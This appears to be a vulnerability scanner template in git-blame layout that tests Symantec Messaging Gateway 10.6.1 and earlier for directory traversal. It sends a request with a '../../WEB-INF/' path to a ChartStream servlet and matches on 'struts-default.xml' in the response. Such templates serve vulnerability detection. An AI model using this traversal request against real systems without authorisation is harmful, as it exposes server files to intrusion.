2020-09-16 12:26:22 +00:00
|
|
|
id: symantec-messaging-gateway
|
2020-09-16 11:13:10 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Symantec Messaging Gateway LFI
|
2021-06-09 12:20:56 +00:00
|
|
|
author: Random_Robbie
|
2020-09-16 11:13:10 +00:00
|
|
|
severity: medium
|
|
|
|
description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal
|
2021-02-12 05:53:01 +00:00
|
|
|
tags: lfi
|
2020-09-16 11:13:10 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "struts-default.xml"
|
2020-09-16 12:26:22 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
2020-10-08 10:31:14 +00:00
|
|
|
- 200
|